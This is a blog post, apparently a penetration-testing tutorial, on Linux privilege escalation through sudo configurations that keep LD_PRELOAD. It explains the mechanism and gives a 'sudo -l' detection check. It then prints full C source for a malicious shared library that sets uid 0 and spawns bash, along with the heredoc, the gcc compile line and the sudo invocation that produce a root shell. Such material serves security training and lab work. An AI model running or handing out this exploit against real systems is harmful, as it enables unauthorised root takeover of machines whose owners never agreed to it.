Sudo (LD_PRELOAD) (Linux Privilege Escalation)

Post author:touhid
Post published:April 12, 2018
Post category:Post Exploit / Privilege Escalation
Post comments:2 Comments

Privilege Escalation from an LD_PRELOAD environment variable. Before exploit let’s read something about LD_PRELOAD environment Variable.

Index

What is LD_PRELOAD?
Detection.
Exploit LD_PRELOAD.

What is LD_PRELOAD?

LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

To avoid this mechanism being using as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.

For More click here.

Detection

Fire up terminal and type:

user@debian:~$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

If output something like this, congratulations target is vulnerable and you can exploit LD_PRELOAD issue to get root privilege shell and to acomplished privilege escalation you also need some sudo permission binary which use LD_PRELOAD envr.

some Sudo command which can be done current user .

Program File :

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Exploit LD_PRELOAD.

open terminal and go to any Writable Directory for dropping shell.

writtable directory like

/tmp
/var/tmp
/dev/shm

in our case we using /tmp directory.

Drop a evil.c using any text editor, here we used cat for droping shell.

user@debian:/tmp$ cat << EOF >> evil.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> void _init() {
> unsetenv("LD_PRELOAD");
> setgid(0);
> setuid(0);
> system("/bin/bash");
> }
> EOF

lest Compile and make object file.

gcc -fPIC -shared -o evil.so evil.c -nostartfiles

Time to final step 3:)

sudo LD_PRELOAD=evil.so <COMMAND>

here <COMMAND> mean which command have u allowed to do with sudo.

you can use any sudo command which allowed to current user.

BooOO00m You got Root SHELL..

Thanks For Reading Comment below your Feedback and suggestion.

Tags: linux, post exploit, sudo

This Post Has 2 Comments

Pingback: Privilege Escalation – Linux – W-Sec
Pingback: TryHackMe – Keldagrim | Kyle AW

Comments

Miro on Metasploitable3 Installing and Building (Step by Step)November 5, 2023
Hej bro, can you provide a link to get the OVA file, I run all the time into errors. I…
Matteo on Metasploitable3 Installing and Building (Step by Step)November 4, 2023
Hello, i would to tell the link for the .ova file is broken. Maybe you can update it.
Aki on Metasploitable3 Installing and Building (Step by Step)June 11, 2023
Hi, the link to Metaspoitable 3 isn't available ( OVA) could upload another link?
Keep your online assets safe with a solid understanding of DNS Records! As the b... - Bug Bounty Tips on Subdomain Takeover Explained with PracticalFebruary 13, 2023
[…] #DNSTechnologies is essential for #CyberSecurity professionals. For more on Subdomain Takeover touhidshaikh.com/blog/2019/01/s… #infosec #dnssecurity #bugbountytips Source by […]
Deidre on Pluck Walkthrough (VulnHub)May 14, 2021
Great post.

Index

What is LD_PRELOAD?

Detection

Program File :

Exploit LD_PRELOAD.

You Might Also Like

NFS weak permissions(Linux Privilege Escalation)

Port Forwarding Explained

Abusing SUDO (Linux Privilege Escalation)

This Post Has 2 Comments

Leave a Reply Cancel reply